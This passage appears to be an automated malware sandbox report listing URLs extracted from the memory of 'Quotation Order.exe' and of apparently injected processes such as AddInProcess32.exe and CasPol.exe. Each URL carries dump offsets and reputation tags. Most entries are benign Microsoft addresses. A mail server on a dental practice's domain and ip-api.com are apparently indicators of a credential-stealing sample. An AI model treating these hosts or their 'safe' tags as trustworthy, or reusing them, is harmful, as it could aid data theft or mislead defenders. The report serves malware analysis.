                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAsvchost.exe, 00000024.00000002.2517767699.000002B805778000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426108352.000002B805776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426050902.000002B805775000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://Passport.NET/tbposesvchost.exe, 00000024.00000002.2518501231.000002B805C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2519109221.000002B805CB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000003.00000002.1366447349.00000215E6C63000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 00000024.00000002.2517675071.000002B80576F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1434712094.000002B80576E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000003.00000002.1366055215.00000215E6C3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://mail.bonnyriggdentalsurgery.com.auAddInProcess32.exe, 0000001A.00000002.1487009646.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.00000000032B7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.00000000032AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAsvchost.exe, 00000024.00000003.1360706982.000002B805729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdssvchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://ip-api.comAddInProcess32.exe, 0000001A.00000002.1487009646.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.000000000325C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://login.microsoftonline.com/ppsecure/devicechangecredential.srfsvchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://login.microsoftonline.com/ppsecure/EnumerateDevices.srfsvchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQuotation Order.exe, 00000000.00000002.1287260691.000002598039A000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.000000000325C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.bingmapsportal.comsvchost.exe, 00000003.00000002.1365924349.00000215E6C13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1363814571.00000215E6C62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1364259093.00000215E6C5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366447349.00000215E6C63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://Passport.NET/tb_svchost.exe, 00000024.00000003.1390016964.000002B804EE4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2516290801.000002B804EE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/02/scs-cbcsvchost.exe, 00000024.00000003.1434799034.000002B805766000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue1svchost.exe, 00000024.00000002.2517675071.000002B80576F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1434712094.000002B80576E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0nwsvchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://account.dyn.com/svchost.exe, 00000011.00000002.1465404864.000001FC9F1C1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1472724735.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000003.00000003.1363948684.00000215E6C5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000003.00000003.1363757483.00000215E6C67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1365960193.00000215E6C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366478054.00000215E6C68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://account.live.com/msangcwamsvchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359102832.000002B805757000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359532181.000002B80572A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=svchost.exe, 00000003.00000002.1366086819.00000215E6C44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1364324633.00000215E6C43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://passport.net/tbsvchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://schemas.xmlsoap.org/ws/2005/02/scyc=svchost.exe, 00000024.00000002.2517880244.000002B805791000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1425939517.000002B80578D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000003.00000003.1364293174.00000215E6C4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/svchost.exe, 00000003.00000003.1362821532.00000215E6C33000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366155272.00000215E6C59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://dynamic.tsvchost.exe, 00000003.00000002.1366539238.00000215E6C76000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://schemas.xmlsoap.org/ws/2005/02/sconsvchost.exe, 00000024.00000002.2517369366.000002B805737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 00000024.00000002.2518501231.000002B805C59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trustncesvchost.exe, 00000024.00000002.2517369366.000002B805737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000003.00000003.1363814571.00000215E6C62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366447349.00000215E6C63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdesAsvchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-sodsvchost.exe, 00000024.00000003.1425060202.000002B805783000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdesEncrsvchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf7svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000003.00000003.1364293174.00000215E6C4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/scrfsvchost.exe, 00000024.00000002.2517472650.000002B80575F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000003.00000003.1364324633.00000215E6C43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://r3.i.lencr.org/0TAddInProcess32.exe, 0000001A.00000002.1477526079.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005FA4000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1647286453.0000000005EB2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2515186191.0000000001154000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2543086036.0000000006090000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.00000000032B7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2513830671.000000000114B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2513830671.000000000115C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 00000024.00000002.2517880244.000002B805791000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515299531.000002B804E73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2517472650.000002B80575F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2517369366.000002B805737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2518883672.000002B805C9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1425939517.000002B80578D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2517123888.000002B805713000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://Passport.NET/STSsvchost.exe, 00000024.00000003.1426512052.000002B805E10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426050902.000002B805775000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionIDsvchost.exe, 00000024.00000002.2519461243.000002B805CF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426345130.000002B805C44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2518233779.000002B805C37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2519335064.000002B805CD4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1402825732.000002B80570F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000003.00000002.1365960193.00000215E6C2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://x1.c.lencr.org/0AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005F80000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1477526079.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005FA4000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1647286453.0000000005EB2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1622449138.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2543086036.0000000006090000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.00000000032B7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2513830671.000000000114B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2543008151.0000000006260000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    http://x1.i.lencr.org/0AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005F80000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1477526079.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005FA4000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1647286453.0000000005EB2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1622449138.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2543086036.0000000006090000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.00000000032B7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2513830671.000000000114B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2543008151.0000000006260000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    http://www.microsoft.co4AddInProcess32.exe, 0000002B.00000002.2543086036.0000000006090000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    http://r3.o.lencr.org0AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005F80000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1477526079.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005FA4000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1647286453.0000000005EB2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2515186191.0000000001154000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2543086036.0000000006090000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.00000000032B7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2513830671.000000000114B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2513830671.000000000115C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    http://Passport.NET/tbsvchost.exe, 00000024.00000003.1360706982.000002B805729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1390230532.000002B80572F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1380858399.000002B805729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1390230532.000002B80572A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 00000024.00000003.1426050902.000002B805775000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1389451722.000002B805735000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        https://signup.live.com/signup.aspxsvchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000003.00000003.1363757483.00000215E6C67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1365960193.00000215E6C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366478054.00000215E6C68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 00000024.00000002.2517123888.000002B805713000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 00000024.00000002.2517369366.000002B805737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAAsvchost.exe, 00000024.00000003.1360706982.000002B805729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 00000003.00000003.1362941126.00000215E6C74000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366539238.00000215E6C76000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359532181.000002B80572A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000003.00000002.1366055215.00000215E6C3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1363814571.00000215E6C62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366447349.00000215E6C63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000003.00000003.1364293174.00000215E6C4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000003.00000003.1363814571.00000215E6C62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366447349.00000215E6C63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://upx.sf.netAmcache.hve.35.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf(svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesvchost.exe, 00000024.00000003.1360706982.000002B805729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1390230532.000002B80572F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1380858399.000002B805729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1390230532.000002B80572A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfsvchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd(svchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000003.00000002.1366055215.00000215E6C3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://account.live.com/Wizard/Password/Change?id=80601svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/scsvchost.exe, 00000024.00000002.2517123888.000002B805713000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
